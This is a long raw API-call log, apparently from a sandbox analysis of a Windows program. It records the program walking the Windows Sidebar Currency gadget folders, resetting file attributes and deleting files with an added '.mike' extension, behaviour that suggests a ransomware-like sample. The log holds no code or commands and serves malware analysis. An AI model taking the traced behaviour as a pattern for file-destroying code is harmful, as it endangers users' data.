GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.018] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\currency.html", dwFileAttributes=0x80) returned 0 [0104.019] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\currency.html.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\en-us\\currency.html.mike")) returned 1 [0104.021] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.025] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml", dwFileAttributes=0x80) returned 0 [0104.026] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\en-us\\gadget.xml.mike")) returned 1 [0104.027] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x74a4860, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x74ca9c0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.027] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23671ecb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0104.027] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1792, dwReserved0=0x0, dwReserved1=0x0, cFileName="currency.html", cAlternateFileName="")) returned 1 [0104.027] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x7a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0104.027] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23671ecb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0104.027] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0104.028] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0104.028] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0104.028] CoTaskMemFree (pv=0x506980) [0104.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0104.028] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23671ecb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.028] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4c2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="currency.css", cAlternateFileName="")) returned 1 [0104.028] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0104.028] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23671ecb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.029] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4c2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="currency.css", cAlternateFileName="")) returned 1 [0104.029] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4c2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="currency.css", cAlternateFileName="")) returned 0 [0104.029] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0104.029] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0104.029] CoTaskMemFree (pv=0x506980) [0104.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0104.029] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23671ecb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.029] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x104de, dwReserved0=0x0, dwReserved1=0x0, cFileName="currency.js", cAlternateFileName="")) returned 1 [0104.029] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="init.js", cAlternateFileName="")) returned 1 [0104.030] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x161e, dwReserved0=0x0, dwReserved1=0x0, cFileName="library.js", cAlternateFileName="")) returned 1 [0104.030] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2bf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="localizedStrings.js", cAlternateFileName="")) returned 1 [0104.030] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1e28, dwReserved0=0x0, dwReserved1=0x0, cFileName="service.js", cAlternateFileName="")) returned 1 [0104.030] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0104.030] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23671ecb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.030] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x104de, dwReserved0=0x0, dwReserved1=0x0, cFileName="currency.js", cAlternateFileName="")) returned 1 [0104.030] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="init.js", cAlternateFileName="")) returned 1 [0104.031] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x161e, dwReserved0=0x0, dwReserved1=0x0, cFileName="library.js", cAlternateFileName="")) returned 1 [0104.031] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2bf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="localizedStrings.js", cAlternateFileName="")) returned 1 [0104.031] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1e28, dwReserved0=0x0, dwReserved1=0x0, cFileName="service.js", cAlternateFileName="")) returned 1 [0104.031] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1e28, dwReserved0=0x0, dwReserved1=0x0, cFileName="service.js", cAlternateFileName="")) returned 0 [0104.031] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0104.031] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0104.031] CoTaskMemFree (pv=0x506980) [0104.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0104.033] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8063a49c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8063a49c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.033] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8640abee, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8640abee, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x296c7da5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x3129, dwReserved0=0x0, dwReserved1=0x0, cFileName="activity16v.png", cAlternateFileName="")) returned 1 [0104.033] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x863263c0, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x863263c0, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x296c7da5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0x0, dwReserved1=0x0, cFileName="add_down.png", cAlternateFileName="")) returned 1 [0104.033] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x863263c0, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x863263c0, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x296edf03, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="add_over.png", cAlternateFileName="")) returned 1 [0104.034] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86300263, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x86300263, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x296edf03, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="add_up.png", cAlternateFileName="")) returned 1 [0104.034] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x862b3fa9, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x862b3fa9, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29714061, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x406b, dwReserved0=0x0, dwReserved1=0x0, cFileName="base-docked.png", cAlternateFileName="")) returned 1 [0104.034] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29714061, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x29714061, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x29714061, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xaa66, dwReserved0=0x0, dwReserved1=0x0, cFileName="base-undocked-2.png", cAlternateFileName="")) returned 1 [0104.034] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86267cef, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x86267cef, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29714061, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd31a, dwReserved0=0x0, dwReserved1=0x0, cFileName="base-undocked-3.png", cAlternateFileName="")) returned 1 [0104.034] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8628de4c, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8628de4c, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2973a1bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xf240, dwReserved0=0x0, dwReserved1=0x0, cFileName="base-undocked-4.png", cAlternateFileName="")) returned 1 [0104.034] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x863987d7, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x863987d7, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29a0dbb9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb93, dwReserved0=0x0, dwReserved1=0x0, cFileName="combo-hover-left.png", cAlternateFileName="")) returned 1 [0104.034] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x863be934, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x863be934, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29a0dbb9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb45, dwReserved0=0x0, dwReserved1=0x0, cFileName="combo-hover-middle.png", cAlternateFileName="")) returned 1 [0104.034] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x863be934, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x863be934, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29a0dbb9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xba3, dwReserved0=0x0, dwReserved1=0x0, cFileName="combo-hover-right.png", cAlternateFileName="")) returned 1 [0104.034] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8634c51d, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8634c51d, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29a33d17, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x304, dwReserved0=0x0, dwReserved1=0x0, cFileName="delete_down.png", cAlternateFileName="")) returned 1 [0104.034] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8634c51d, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8634c51d, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29a33d17, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x2b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="delete_over.png", cAlternateFileName="")) returned 1 [0104.034] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8634c51d, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8634c51d, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29a59e75, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="delete_up.png", cAlternateFileName="")) returned 1 [0104.035] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x863987d7, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x863987d7, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29a59e75, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xcc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="graph_down.png", cAlternateFileName="")) returned 1 [0104.035] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8637267a, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8637267a, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29a59e75, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd64, dwReserved0=0x0, dwReserved1=0x0, cFileName="graph_over.png", cAlternateFileName="")) returned 1 [0104.035] 